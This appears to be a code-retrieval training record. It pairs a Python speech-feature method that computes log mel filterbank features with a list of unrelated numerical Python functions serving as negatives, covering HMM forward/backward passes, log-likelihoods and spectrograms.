def _extract_fbank(self, sig, sr): emphasized_signal = np.append(sig[0], sig[1:] - 0.97 * sig[:-1]) frame_length, frame_step = FRAME_SIZE * sr, FRAME_STRIDE * sr signal_length = len(emphasized_signal) frame_length = int(round(frame_length)) frame_step = int(round(frame_step)) num_frames = int(np.ceil(float(np.abs(signal_length - frame_length)) / frame_step)) pad_signal_length = num_frames * frame_step + frame_length z = np.zeros((pad_signal_length - signal_length)) pad_signal = np.append(emphasized_signal, z) indices = np.tile(np.arange(0, frame_length), (num_frames, 1)) + np.tile(np.arange(0, num_frames * frame_step, frame_step), (frame_length, 1)).T frames = pad_signal[indices.astype(np.int32, copy=False)] # Apply the hamming window function frames *= np.hamming(frame_length) nfft, nfilt = 512, 40 mag_frames = np.absolute(np.fft.rfft(frames, nfft)) pow_frames = ((1.0 / nfft) * (mag_frames ** 2)) low_freq_mel = 0 ### AI: # the following line works correcty as-is in python3 # *** high_freq_mel = (2595 * np.log10(1 + (sr / 2) / 700)) *** # however, in python it results in a smaller value of 'high_freq_mel' # as the 'sr' variable is interpreted as integer # it has minor impact on the performance of the natively trained and tested models # however, if one uses python to test the models that were created in python3 # the models show the CER drop as much as 1% absolute # the line below fixes that issue completely high_freq_mel = (2595 * np.log10(1 + (float(sr) / 2) / 700)) mel_points = np.linspace(low_freq_mel, high_freq_mel, nfilt + 2) hz_points = (700 * (10**(mel_points / 2595) - 1)) bin = np.floor((nfft + 1) * hz_points / sr) fbank = np.zeros((nfilt, int(np.floor(nfft / 2 + 1)))) for m in range(1, nfilt + 1): f_m_minus = int(bin[m - 1]) # left f_m = int(bin[m]) # center f_m_plus = int(bin[m + 1]) # right for k in range(f_m_minus, f_m): fbank[m - 1, k] = (k - bin[m - 1]) / (bin[m] - bin[m - 1]) for k in range(f_m, f_m_plus): fbank[m - 1, k] = (bin[m + 1] - k) / (bin[m + 1] - bin[m]) filter_banks = np.dot(pow_frames, fbank.T) filter_banks = np.where(filter_banks == 0, np.finfo(float).eps, filter_banks) # AI: # *** filter_banks = 20 * np.log10(filter_banks) *** # 'pow_frames' contains the power spectrum (i.e. squared magnitude) # the proper formula to convert to the logarithm scale in decibels is # 10*log10(POW), while 20*log10(MAG) is used for the un-squared magnitude # this way both formuli result in the same outcome filter_banks = 10 * np.log10(filter_banks) # Apply mean normalization filter_banks -= (np.mean(filter_banks, axis=0) + 1e-8) filter_banks = filter_banks.transpose() delta = librosa.feature.delta(filter_banks) double_delta = librosa.feature.delta(delta) fbank_feat = np.vstack([filter_banks, delta, double_delta]); fbank_feat = fbank_feat.transpose() assert np.shape(fbank_feat)[1] == 120, "input dimensions incorrect" # Truncate if audio sequence is too long fbank_length = len(fbank_feat) if fbank_length > self.max_input_seq_length: fbank_feat = fbank_feat[:self.max_input_seq_length] return fbank_feat, fbank_length
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def logMelSpectrum(input, samplingrate):\n nfft = input.shape[1]\n N = input.shape[0]\n filters = trfbank(samplingrate, nfft)\n\n # plot Mel filters\n # plt.plot(filters)\n # plt.title('Mel filters')\n # plt.show()\n\n output = np.zeros((N, filters.shape[0]))\n for j in range(filters.shape[0]): # apply each filterbank to the whole power spectrum\n for i in range(N):\n output[i, j] = np.log(np.sum(input[i] * filters[j]))\n\n # myplot(output, 'Filter Banks')\n\n return output", "def statePosteriors(log_alpha, log_beta):\n return log_alpha + log_beta - logsumexp(log_alpha[-1,:])", "def log2FC_data(data):\n log2FC_df = pd.DataFrame()\n for i in range(0,len(data.columns),10):\n i = i\n data_subset = data[data.columns[i:i+10]]\n log_data = data_subset.apply(np.log2)\n \n new_df = pd.DataFrame()\n for j in range(len(log_data.columns)):\n tmp_col = log_data.iloc[:, j].name\n tmp_df = log_data.iloc[:,0] - log_data.iloc[:,j]\n new_df[tmp_col] = tmp_df\n \n log2FC_df = log2FC_df.append(new_df.T)\n log2FC_df = log2FC_df.T\n return log2FC_df", "def statePosteriors(log_alpha, log_beta):", "def extract_features(self, np_samples):\n log_mel_examples = []\n samples = np_samples.shape[0]\n if self._normalize:\n min_ratio = 0.1 # = 10^(max_db/-20) with max_db = 20\n np_samples /= np.maximum(min_ratio, np.amax(np_samples))\n if self._step_size is not None:\n samples_splits = []\n for i in xrange(0, samples - vggish_params.SAMPLE_RATE + 1,\n self._step_size):\n samples_splits.append(np_samples[i:i + vggish_params.SAMPLE_RATE])\n else:\n samples_splits = np.split(np_samples, samples / vggish_params.SAMPLE_RATE)\n # Compute log mel spectrogram features.\n for samples_window in samples_splits:\n log_mel = mel_features.log_mel_spectrogram(\n samples_window,\n audio_sample_rate=vggish_params.SAMPLE_RATE,\n log_offset=vggish_params.LOG_OFFSET,\n window_length_secs=vggish_params.STFT_WINDOW_LENGTH_SECONDS,\n hop_length_secs=vggish_params.STFT_HOP_LENGTH_SECONDS,\n num_mel_bins=vggish_params.NUM_MEL_BINS,\n lower_edge_hertz=vggish_params.MEL_MIN_HZ,\n upper_edge_hertz=vggish_params.MEL_MAX_HZ)\n\n log_mel_examples.append(\n mel_features.frame(\n log_mel,\n window_length=self._example_window_length,\n hop_length=self._example_window_length))\n return log_mel_examples", "def test_loglike(dlm,Cl,noise,beam):\n lmax = Cl.shape[0]\n tt_exp = -1./2 * np.real(np.vdot(dlm.T,hp.almxfl(dlm,1/(beam[:lmax]**2*Cl[:,1]+noise[:lmax]))))\n #plt.plot(Cl[:,1])\n tt_det = - 1./2 *(np.arange(1,lmax+1)*np.log((noise[:lmax]+Cl[:,1]*beam[:lmax]**2))).sum() \n tt_f = tt_exp + tt_det\n return tt_exp,tt_det,tt_f#,Cl[:,1]", "def log_distr_fdmw(self, dnu, logflux, dme, logw, alpha, logls, logl0, mu, sigma, gtype=None):\n #stepdms = 100/1000.\n #vdms = np.arange(0, 100, stepdm)\n stepz = (np.log(self.Zmax) - np.log(self.Zmin)) / 1000\n vz = np.exp(np.arange(np.log(self.Zmin), np.log(self.Zmax), stepz))\n lik = 0\n for z in vz:\n likv = np.exp(self.log_distr_fdmwz(dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=gtype))\n lik += z * stepz * likv\n ind = lik > 0\n ind2 = lik <= 0\n loglik = lik.copy()\n loglik[ind] = np.log(lik[ind])\n loglik[ind2] = np.ones(loglik[ind2].shape) * -1e99\n return loglik", "def _log_fold_change_pairs(self, idx0, idx1, base):\n logfc = np.zeros(shape=(len(idx0), len(idx1), self._theta_mle.shape[1]))\n for i, xi in enumerate(idx0):\n for j, xj in enumerate(idx1):\n logfc[i, j, :] = self._theta_mle[xi, :] - self._theta_mle[xj, :]\n\n if base == np.e:\n return logfc\n else:\n return logfc / np.log(base)", "def compute_edge_logits(self):", "def _log_fold_change_pairs(self, idx0, idx1, base):\n logfc = np.tile(np.NaN, [len(idx0), len(idx1), self.model_estim.x.shape[1]])\n for i, xi in enumerate(idx0):\n for j, xj in enumerate(idx1):\n logfc[i, j, :] = self._theta_mle[xj, :] - self._theta_mle[xi, :]\n logfc[j, i, :] = -logfc[i, j, :]\n\n if base == np.e:\n return logfc\n else:\n return logfc / np.log(base)", "def logfbank(signal,samplerate=16000,winlen=0.025,winstep=0.01,\n nfilt=40,nfft=512,lowfreq=64,highfreq=None,dither=1.0,remove_dc_offset=True,preemph=0.97,wintype='hamming'):\n feat,energy = fbank(signal,samplerate,winlen,winstep,nfilt,nfft,lowfreq,highfreq,dither, remove_dc_offset,preemph,wintype)\n return numpy.log(feat)", "def logits(self, features: torch.Tensor) -> torch.Tensor:\n return self.temporal_module(features)", "def logMelSpectrum(input, samplingrate):\n nfft = input.shape[1]\n tr_filter = trfbank(samplingrate, nfft)\n return np.log(np.dot(input, tr_filter.transpose()))", "def log_prior_grad(self, inputs):", "def get_logCRF(train, model):\n word = train[0]\n Y = train[1]\n char_count, _ = word.shape\n # calculating forward messages\n alpha = np.zeros((char_count, model.dimY))\n first_term = np.dot(word, model.getW(model.labels))\n second_term = model._T\n for i in range(1, char_count):\n sum_term = (first_term[i-1] + alpha[i-1]) + second_term\n alpha[i] = np.apply_along_axis(logsumexp_trick, 1, sum_term) \n # getting logZ from messages\n logZ = logsumexp_trick(first_term[char_count-1]+alpha[char_count-1])\n w_term = np.sum(model.getW(Y).transpose() * word) # $\\sum_{j=1}^m {W_{yj} . x_j}$\n t_term = np.sum(model.getT(Y[:-1], Y[1:])) #$T_{yj, yj+1}\n value = -logZ + w_term + t_term\n return value", "def loglf2py(store):\n loglike=0.0\n return loglinear.logl(store['xb'],store['xmatf'], store['beta'],store['yvec'],loglike)", "def logfbank(signal,samplerate=16000,winlen=0.025,winstep=0.01,\n nfilt=26,nfft=512,lowfreq=0,highfreq=None,preemph=0.97): \n feat, energy = fbank(signal,samplerate,winlen,winstep,nfilt,nfft,lowfreq,highfreq,preemph)\n return pylab.log(feat)", "def logistic_derivative(errors):\n return [log_deriv(error) for error in errors]", "def log(self): # just use base?\n return Factor().__build( VarSet(self.v) , np.log(self.t) )", "def log2(self):\n return Factor().__build( VarSet(self.v) , np.log2(self.t) )", "def log_fbank(signal, samplerate=16000, win_length=0.025, win_step=0.01, filters_num=26, NFFT=512, low_freq=0,\n\t\t\t high_freq=None, pre_emphasis_coeff=0.97):\n\tfeat, energy = fbank(signal, samplerate, win_length, win_step, filters_num, NFFT, low_freq, high_freq,\n\t\t\t\t\t\t pre_emphasis_coeff)\n\treturn numpy.log(feat)", "def fdm(self,trc,fd_step,lags,noise_scalar):\n ress=[]\n trc_out=trc/np.amax(np.abs(trc))\n noise=np.random.normal(0,1,len(trc_out))*(np.std(trc_out)/noise_scalar)\n trc_out=trc_out+noise\n for i,lag in enumerate(lags):\n trc_cp=trc_out.copy()\n t=len(trc)-1\n trc_cp[0:fd_step]=0\n while t>fd_step-1:\n trc_win=trc_out[t-fd_step:t+1]\n t_win=fd_step-1\n res=0\n while t_win>lag-1:\n res+=np.square(trc_win[t_win-lag]-trc_win[t_win])\n t_win-=1\n res=np.log10(1/(fd_step-lag)*res)\n trc_cp[t]=res\n t-=1\n if len(ress)==0:\n ress=np.reshape(trc_cp,(len(trc_cp),1))\n else:\n ress=np.concatenate((ress,np.reshape(trc_cp,(len(trc_cp),1))),axis=1)\n for i,j in enumerate(ress):\n slope = linregress(lags,ress[i,:])[0]\n trc_out[i]=slope\n \n return trc_out", "def log_forward_computations(self, x: list): \n n_x = len(x)\n \n # log_f_x initialized to -Inf because log(0) = -Inf\n log_f_x = np.zeros((self.n_states, n_x)) + logzero()\n x_emission_scores = np.array([self.scores['emission'][:, self.word_to_pos[w] if w in list(self.word_to_pos.keys()) else self.word_to_pos['UnknownWord']] for w in x]).T\n \n log_f_x[:,0] = x_emission_scores[:, 0] + self.scores['initial']\n \n for i in range(1,n_x):\n for s in range(self.n_states):\n log_f_x[s,i] = logsumexp(self.scores['transition'][s,:] + \n log_f_x[:,i-1]) + x_emission_scores[s, i]\n\n \n log_likelihood = logsumexp(self.scores['final'] + log_f_x[:,-1])\n \n return log_f_x, log_likelihood", "def log_distr_fdmwz(self, dnu, logflux, dme, logw, z, alpha, logls, logl0, mu, sigma, gtype=None):\n flux = np.power(10., logflux)\n logl = np.log10(self.cos.Luminosity(z, f=flux, dnu=dnu))\n logint1 = self.log_IntBeam(logl, alpha, logls, logl0)\n #print logint1\n logw0 = logw - np.log10(1+z)\n logfw = self.log_dis_logw(logw0, mu, sigma)\n logfz = self.log_Distribution_volume(z)\n dmi = self.cos.DispersionMeasure_IGM(z)\n u1 = (dme-dmi)*(1+z)*self.kappa(z)\n u2 = ((dme-dmi)*(1+z)-self.DMsmax)*self.kappa(z)\n #print u2\n logint2 = np.ones(u2.shape) * (-1e99)\n ind = u2 > 0\n logint2[ind] = self.log_IntDMsrc(u1[ind],u2[ind],gtype=gtype)\n #print logint2\n loglikv = logint1 + logfz + logfw + logint2 + np.log(1+z)\n return loglikv", "def loglike(store):\n nobs = store['yvec'].shape[0]\n calcweighted(store)\n store['regsampler'].update_yvec(store['yvectil'])\n store['regsampler'].update_xmat(store['xmattil'])\n return store['regsampler'].loglike(store['sigma'], store['beta'])", "def addFactors(self, flist, copy=True, isLog=False):\n row = np.zeros(2*len(flist),dtype=int)-1; col=row.copy(); data=np.zeros(2*len(flist));\n for k,f in enumerate(flist):\n if not isLog: \n if np.any(f.t<=0): f = f+1e-10; # TODO: log nonzero tol\n f = f.log()\n if f.nvar == 1:\n Xi = f.vars[0]\n self.h[Xi] += .5*(f[1]-f[0])\n self.c += .5*(f[1]+f[0])\n else:\n Xi,Xj = f.vars[0],f.vars[1]\n row[2*k],col[2*k],data[2*k] = int(Xi),int(Xj), .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n row[2*k+1],col[2*k+1],data[2*k+1] = col[2*k],row[2*k],data[2*k] \n #L[Xi,Xj] += .25*(f[1,1]+f[0,0]-f[0,1]-f[1,0])\n self.h[Xi] += .5*(f[1,0]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.h[Xj] += .5*(f[0,1]-f[0,0])+data[2*k] #L[Xi,Xj]\n self.c += .25*(f[1,1]+f[1,0]+f[0,1]+f[0,0])\n self.L += csr((data[row>=0],(row[row>=0],col[row>=0])),shape=(self.nvar,self.nvar));", "def logmelfilterbank(\n audio,\n sampling_rate,\n fft_size=1024,\n hop_size=256,\n win_length=None,\n window=\"hann\",\n num_mels=80,\n fmin=None,\n fmax=None,\n eps=1e-10,\n):\n # # get amplitude spectrogram\n # x_stft = librosa.stft(audio, n_fft=fft_size, hop_length=hop_size,\n # win_length=win_length, window=window, pad_mode=\"reflect\")\n # spc = np.abs(x_stft).T # (#frames, #bins)\n\n # # get mel basis\n # fmin = 0 if fmin is None else fmin\n # fmax = sampling_rate / 2 if fmax is None else fmax\n # mel_basis = librosa.filters.mel(sampling_rate, fft_size, num_mels, fmin, fmax)\n\n # return np.log10(np.maximum(eps, np.dot(spc, mel_basis.T)))\n # logger.info('{} {}'.format(audio.shape, audio.device))\n x_stft2 = (\n torch.stft(\n audio,\n n_fft=fft_size,\n hop_length=hop_size,\n win_length=win_length,\n window=window,\n pad_mode=\"reflect\",\n ).transpose(0, 1)\n ** 2\n )\n # logger.info('{} {}'.format(x_stft2.shape, x_stft2.device))\n spc = (x_stft2[:, :, 0] + x_stft2[:, :, 1]).sqrt()\n\n # get mel basis\n fmin = 0 if fmin is None else fmin\n fmax = sampling_rate / 2 if fmax is None else fmax\n mel_basis = torch.tensor(\n librosa.filters.mel(sampling_rate, fft_size, num_mels, fmin, fmax),\n device=spc.device,\n ).transpose(0, 1)\n return torch.matmul(spc, mel_basis).clamp(min=eps).log10()", "def forward(log_emlik, log_startprob, log_transmat):\n alpha = np.zeros(log_emlik.shape)\n\n alpha[0,:] = log_startprob[0:-1] + log_emlik[0,:]\n\n sum_row = 0;\n log_transmat = log_transmat[0:-1];\n\n\n for frame in range(1,len(log_emlik)):\n\n for state in range(0,len(log_emlik[0])):\n\n alpha[frame,state] = logsumexp(alpha[frame-1,:] + log_transmat[:,state]) + log_emlik[frame,state]\n #print(alpha[frame,state])\n #print(alpha[frame,:])\n\n return alpha", "def statePosteriors(log_alpha, log_beta):\n\n gamma = np.zeros(log_alpha.shape)\n\n gamma = log_alpha + log_beta\n\n gamma = gamma - logsumexp(log_alpha[-1,:])\n\n return gamma", "def get_weights_from_log(log, plot = False):\n with open(log, 'r') as f:\n log_file = f.readlines()\n\n i = 0\n time = []\n weights_info = []\n weights_0 = []\n while i < len(log_file):\n if 'init-lambda-weights[' in log_file[i]:\n weights_0.append(float(log_file[i].split('=')[-1]))\n\n if 'MC-lambda information' in log_file[i]:\n # Finding the time\n for j in range(i,0,-1):\n if log_file[j].startswith(' Step Time'):\n j += 1\n time.append(float(log_file[j].split()[-1]))\n break\n # Finding the weight\n weights_info_tmp = []\n i += 3\n while log_file[i] != '\\n':\n split = log_file[i].split()\n count = int(split[2])\n weight = float(split[3])\n weights_info_tmp.append((count, weight))\n i += 1\n weights_info.append(weights_info_tmp)\n i += 1\n # Add weights at t = 0, because the counts are all 0 and I delate the entrances with total count 0 in next lines,\n # What i could do is put 1 in the initial temperature\n time.insert(0,0)\n weights_info.insert(0,list(zip([1] + (len(weights_0) - 1)*[0], weights_0)))\n\n #Converting to array\n time = np.array(time)\n weights_info = np.array(weights_info)\n # Some times (I don't know why) GROMACS reset all the weights and all the counts are 0. We need to eliminate those points\n sum_of_weights = weights_info[:,:,0].sum(axis = 1)\n time = time[sum_of_weights != 0]\n weights_info = weights_info[sum_of_weights != 0]\n sum_of_weights = sum_of_weights[sum_of_weights != 0]\n\n\n if plot:\n dir = os.path.dirname(log)\n fig, axes = plt.subplots(2, figsize = (16,9), sharex=True)\n NUM_COLORS = weights_info.shape[1]\n cm = plt.get_cmap('viridis')#gist_rainbow viridis\n for axe in axes:\n axe.set_prop_cycle('color', [cm(1.*j/NUM_COLORS) for j in range(NUM_COLORS)])\n\n probability = weights_info[:,:,0] / sum_of_weights[:,np.newaxis]\n for j in range(weights_info.shape[1]):\n #axes[0].plot(time, weights_info[:,j,0], label = str(j))\n axes[0].plot(time, probability[:,j], label = str(j))\n axes[1].plot(time, weights_info[:,j,1])\n\n fig.legend(loc = 'lower center', ncol = int(weights_info.shape[1] / 2))\n axes[0].set(\n xlim = (time.min(), time.max()),\n ylim = (0,1),\n ylabel = 'Probability',\n )\n axes[1].set(\n xlabel = 'Time [ps]',\n ylabel = 'Weight values'\n )\n #plt.show()\n fig.savefig(os.path.join(dir,'weights_progression.svg'), bbox_inches=\"tight\")\n\n # Plotting the violin plot of the weights\n df = pd.DataFrame()\n for j in range(weights_info.shape[1]):\n #df[temperatures[j]] = weights_info[:,j,1]\n df[j] = weights_info[:,j,1]\n # Set up the matplotlib figure\n sns.set_theme(style=\"whitegrid\")\n fig, ax = plt.subplots(figsize=(25, 25))\n\n # Draw a violinplot with a narrower bandwidth than the default\n sns.violinplot(data=df, palette=\"Set3\", bw=.2, cut=1, linewidth=1)\n # The plot is not over the actual temperatures, the temperatures ara only labels\n ax.plot(range(len(weights_info[0,:,1])), weights_info[0,:,1], '-o', label = 'Initial weights')\n ax.set(\n title = 'Weights per state over the entire simulation',\n xlabel = 'Sate',\n ylabel = 'Weight',\n )\n plt.legend()\n sns.despine(left=True, bottom=True)\n #plt.show()\n fig.savefig(os.path.join(dir,'weights_per_state.svg'), bbox_inches=\"tight\")\n sns.reset_defaults()\n\n return time, weights_info", "def log_features(data, columns):\n for col in columns:\n # deal with 0/1 values\n if np.sum(data[col] == 0) > 0:\n print('Replacing 0s with 0.025...')\n data.loc[data[col] == 0, col] = 0.025\n\n data[col] = np.log(data[col])", "def forward(self, reps):\n assert reps.shape[-1] == N_DIMS_PER_REP\n logits = torch.zeros(len(reps), N_UNIQUE_FEATS)\n logits[:, feat] = 1\n return logits", "def og_features(scan,filt=None,base_noise=None,thresh=-1.4781e-10,diff=1,verbose=False,scale=10):\n #get gradients of data\n der = np.array(np.gradient(scan,diff))\n \n #calculate gardient magnitudes and directions\n der_mag = np.linalg.norm(der,axis=0) \n der_uvecs = der/der_mag\n \n z_cur = np.copy(scan).ravel()\n\n #estimate noise level and set derivative filter threshold\n if filt is None:\n filt = np.mean(signaltonoise(der_mag)[-1])\n \n \n if base_noise is not None:\n filt = np.maximum(filt,base_noise)\n \n\n\n #filter directions and magnitudes\n x, y, z = der_uvecs[0].ravel(), der_uvecs[1].ravel(), der_mag.ravel()\n \n #filter using threshold and filt\n x_filt, y_filt, z_filt = x[z_cur>thresh], y[z_cur>thresh], z[z_cur>thresh]\n #x_filt, y_filt, z_filt = x, y, z\n\n \n #print(len(z_filt))\n x_filt, y_filt, z_filt = x_filt[z_filt>filt], y_filt[z_filt>filt], z_filt[z_filt>filt]\n\n \n #calculate angles\n angles_filt = np.sign(y_filt)*np.arccos(x_filt/1)\n\n \n #print(len(angles_filt))\n \n if len(angles_filt) < 2:\n return 0,0,0\n \n #fit single line\n sol1 = least_squares(ress_1line,[-np.pi/2],args=(angles_filt,),bounds=[-np.pi,0],method='dogbox',jac='2-point',max_nfev=2000)\n\n #fit two lines by grid search\n #sol_grid = grid_search(ress_2line,angles_filt,[[-np.pi,0],[-np.pi,0]])\n \n \n singleline = sol1.x[0]\n \n mx = np.minimum(np.abs(singleline-(-np.pi)),np.abs(singleline))\n \n sol_grid = grid_search(ress_2line_pm,angles_filt,[[0,mx]],umid = singleline)\n spread_lines = sol_grid[1]\n sol_grid[1] = [singleline+spread_lines,singleline-spread_lines]\n \n \n #compute average of squared residuals for both cases\n resid1 = ress_1line(sol1.x,angles_filt)\n\n grid_c11 = np.average(np.power(resid1,2))\n \n grid_c11 = np.average(np.abs(resid1))\n \n grid_c21 = sol_grid[-1]\n \n \n multip = cotunnel_score2(scan,scan>thresh,diff,scale)\n \n final_grid2 = multip*(grid_c11-grid_c21)\n \n \n \"\"\"\n plt.scatter(angles_filt,z_filt,marker='x',c='k',s=15,linewidth=0.4)\n plt.axvline(sol1.x,color='b')\n plt.axvline(sol1.x+(np.pi),color='b')\n plt.axvline(sol_grid[1][0],0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1],0,color='r', linestyle='--')\n \n plt.axvline(sol_grid[1][0]+(np.pi),0,color='r', linestyle='--')\n plt.axvline(sol_grid[1][1]+(np.pi),0,color='r', linestyle='--')\n \n plt.xlabel(\"$\\\\theta_g$ / rad\")\n \n plt.xlim([-np.pi,np.pi])\n plt.ylim([0,z.max()])\n \n \n plt.ylabel(\"$|g|$\")\n \n plt.xticks([-np.pi,0,np.pi])\n \n plt.locator_params(axis='y', nbins=2)\n \n plt.savefig(\"og_fig.svg\")\n \n plt.show()\n \"\"\"\n return final_grid2,multip,(grid_c11-grid_c21)", "def log_marginal_likelihood(X_train,y_train,phi,tau=1.,Ve=1.e-10):", "def llf(self):\n return self.model.loglike(self.params)", "def logistic(weights, data, targets, hyperparameters):\n\n # TODO: Finish this function\n\n return f, df, y", "def compute_forward_variables(self, normalized_logits, target):\n\n target_length = target.shape[0]\n num_time_steps = normalized_logits.shape[0]\n\n\t\t######################\n\t\t### YOUR CODE HERE ###\n\t\t######################\n \n blank_label = normalized_logits.shape[1] - 1\n l = add_blanks(target, blank_label)\n target_length = l.shape[0]\n\n # init\n alpha = np.zeros((target_length, num_time_steps))\n alpha[0, 0] = normalized_logits[0, blank_label] # where s = 0, t = 0\n alpha[1, 0] = normalized_logits[0, target[0]] # where s = 1, t = 0\n for i in xrange(2, num_time_steps): # for all s >= 2, t = 0\n alpha[i, 0] = 0\n\n # recursive case\n for t in xrange(1, num_time_steps):\n for s in xrange(2, target_length):\n \n a_bar = alpha[s, t-1] + alpha[s-1, t-1] \n\n if l[s] == blank_label or l[s-2] == l[s]:\n alpha[s, t] = normalized_logits[t, l[s]] * a_bar\n else:\n alpha[s, t] = normalized_logits[t, l[s]] * (a_bar + alpha[s-2, t-1])\n return alpha", "def __convert_to_log(self):\n for i in range(self.nStates):\n if self.pi[i]>0:\n self.pi[i]=log(self.pi[i])\n else:\n self.pi[i]=float('-inf')\n for j in range(self.nStates):\n if self.t[i][j]>0:\n self.t[i][j]=log(self.t[i][j])\n else:\n self.t[i][j]=float('-inf')\n for j in range(self.nObs):\n if self.e[i][j]>0:\n self.e[i][j]=log(self.e[i][j])\n else:\n self.e[i][j]=float('-inf')\n self.logdomain=True", "def forward(log_emlik, log_startprob, log_transmat):\n logPi=log_startprob[:-1]\n logB=log_emlik\n logA=log_transmat[:-1,:-1]\n alpha = np.zeros_like(logB)\n alpha[0]=logB[0]+logPi\n for i in range(1,logB.shape[0]):\n for j in range(logA.shape[0]):\n alpha[i][j]=logsumexp(alpha[i-1]+logA[:,j]+logB[i][j])\n return alpha", "def logmelfilterbank(audio,\r\n sampling_rate,\r\n fft_size=1024,\r\n hop_size=256,\r\n win_length=None,\r\n window=\"hann\",\r\n num_mels=80,\r\n fmin=None,\r\n fmax=None,\r\n eps=1e-10,\r\n ):\r\n # get amplitude spectrogram\r\n x_stft = librosa.stft(audio, n_fft=fft_size, hop_length=hop_size,\r\n win_length=win_length, window=window, pad_mode=\"reflect\")\r\n spc = np.abs(x_stft).T # (#frames, #bins)\r\n\r\n # get mel basis\r\n fmin = 0 if fmin is None else fmin\r\n fmax = sampling_rate / 2 if fmax is None else fmax\r\n mel_basis = librosa.filters.mel(sampling_rate, fft_size, num_mels, fmin, fmax)\r\n\r\n return np.log10(np.maximum(eps, np.dot(spc, mel_basis.T)))", "def NMF(model, maxIter=100, beliefs=None, verbose=False):\n if beliefs is None: beliefs = [Factor([Xi],1.0/Xi.states) for Xi in model.X]\n \n lnZ = sum([beliefs[Xi].entropy() for Xi in model.X])\n for f in model.factors:\n m = f.log()\n for v in f.vars: m *= beliefs[v]\n lnZ += m.sum()\n if verbose: print(\"Iter 0: \"+str(lnZ))\n\n for t in xrange(1,maxIter+1): # for each iteration:\n # Update all the beliefs via coordinate ascent:\n for Xi in model.X: # for each variable, \n bNew = 0.0 # compute E[ log f ] as a function of Xi:\n for f in model.factorsWith(Xi,copy=False): # for each factor f_a, compute:\n m = f.log() # E[log f_a] = \\sum \\log f_a \\prod b_v\n for v in f.vars - [Xi]: m *= beliefs[v]\n bNew += m.marginal([Xi]) # sum them up to get E[log f]\n bNew -= bNew.max() # (numerical issues)\n bNew = bNew.exp()\n bNew /= bNew.sum() # set b(Xi) = exp( E[log f] ) / Z\n beliefs[Xi] = bNew\n #\n # Compute the lower bound on the partition function:\n # E_b [ log f ] + H(b) = \\sum_a E[log f_a] + \\sum_i H(b_i) for independent beliefs\n lnZ = sum([beliefs[Xi].entropy() for Xi in model.X])\n for f in model.factors:\n m = f.log()\n for v in f.vars: m *= beliefs[v]\n lnZ += m.sum()\n if verbose: print(\"Iter \"+str(t)+\": \"+str(lnZ))\n return lnZ,beliefs", "def forward(self, mel_coarse):\n logit = self.layers(mel_coarse)\n y = F.sigmoid(logit)\n return y, logit", "def brownian_motion_log_returns(param):\n sqrt_delta_sigma = math.sqrt(param.time_rate) * param.vol\n return nrand.normal(loc=0, scale=sqrt_delta_sigma, size=param.time)", "def brownian_motion_levels(param):\n return convert_to_prices(param, brownian_motion_log_returns(param))", "def log10(self):\n return Factor().__build( VarSet(self.v) , np.log10(self.t) )", "def log2_inplace(a):", "def _log_fold_change_pairs(self, idx0, idx1, base):\n assert np.all([x < self._pval.shape[1] for x in idx0])\n assert np.all([x < self._pval.shape[1] for x in idx1])\n if base == np.e:\n return self._logfc[idx0, :, :][:, idx1, :]\n else:\n return self._logfc[idx0, :, :][:, idx1, :] / np.log(base)", "def __log_likelihood(self, params, *args):\n\t\tX, y, feature_set, lambda_reg, empirical_weights, verbose, sign = args\n\n\t\tno_example = len(X)\n\t\ttotal_logZ = 0\n\t\ttotal_logProb = 0\n\t\texpected_weights = np.zeros(len(feature_set))\n\t\tfor t in range(len(X)):\n\t\t\t# example_features = X[t], example_labels = y[t]\n\n\t\t\tpotential = np.zeros(len(X[t]))\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\t#candidate_features = X[t][i], candidate_label = y[t][i]\n\t\t\t\tpotential[i] = feature_set.calc_inner_product(X[t][i], params)\n\n\t\t\t#scaling\n\t\t\tpotential = potential - np.max(potential, keepdims=True)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\ttotal_logProb += potential[i] * y[t][i]\n\n\t\t\tpotential, Z = self.__softmax(potential)\n\n\t\t\tfor i in range(len(X[t])):\n\t\t\t\tfeature_set.calc_inner_sum(expected_weights, X[t][i], potential[i])\n\n\t\t\ttotal_logZ += log(Z)\n\n\t\t# _params = feature_set.get_regularized_params(params, 'bias')\n\t\t_params = params\n\t\tlog_likelihood = total_logProb - total_logZ - (lambda_reg/2) * np.sum(np.multiply(_params,_params))\n\t\tgradients = empirical_weights - expected_weights - lambda_reg * _params\n\n\t\tglobal SUB_ITERATION_NUM\n\t\tif verbose:\n\t\t\tsub_iteration_str = ' '\n\t\t\tif SUB_ITERATION_NUM > 0:\n\t\t\t\tsub_iteration_str = '(' + '{0:02d}'.format(SUB_ITERATION_NUM) + ')'\n\t\t\tprint(' ', '{0:03d}'.format(ITERATION_NUM), sub_iteration_str, ':', log_likelihood * sign)\n\n\t\tSUB_ITERATION_NUM += 1\n\n\t\treturn sign * log_likelihood, sign * gradients", "def add_mf_updates(self):\n \n if self.num_hidden == 0:\n \n self.mf_updates, _ =\\\n theano.scan(lambda i: self.sigmoid_update(self.mf_vis_p,i),\n sequences = [T.arange(self.num_vars)])\n \n elif self.num_hidden > 0:\n \n self.mf_vis_updates = self.sigmoid_update_vis(self.mf_hid_p)\n \n self.mf_hid_updates = self.sigmoid_update_hid(self.mf_vis_p)\n \n # damp high oscillations:\n self.mf_vis_updates = 0.02*self.mf_vis_p + 0.98*self.mf_vis_updates\n \n self.mf_hid_updates = 0.02*self.mf_hid_p + 0.98*self.mf_hid_updates\n #####", "def log_inplace(a):", "def f_log_decoding(x, out_reflection=False):\n a = 0.555556\n b = 0.009468\n c = 0.344676\n d = 0.790453\n e = 8.735631\n f = 0.092864\n cut2 = 0.100537775223865\n\n y = np.where(x < cut2,\n (x - f) / e,\n (10 ** ((x - d) / c)) / a - (b / a))\n\n if not out_reflection:\n y = y / 0.9\n\n return y", "def backward(log_emlik, log_startprob, log_transmat):\n #print(log_transmat)\n beta = np.zeros(log_emlik.shape)\n n = len(log_emlik)-2\n log_transmat = log_transmat[0:-1,0:-1];\n\n\n\n while n >= 0:\n\n for j in range(0,len(log_emlik[0])):\n\n beta[n,j] = logsumexp(log_transmat[j,:] + log_emlik[n+1,:] + beta[n+1,:])\n\n n = n -1\n #print(beta[n,:])\n #print(beta)\n return beta", "def 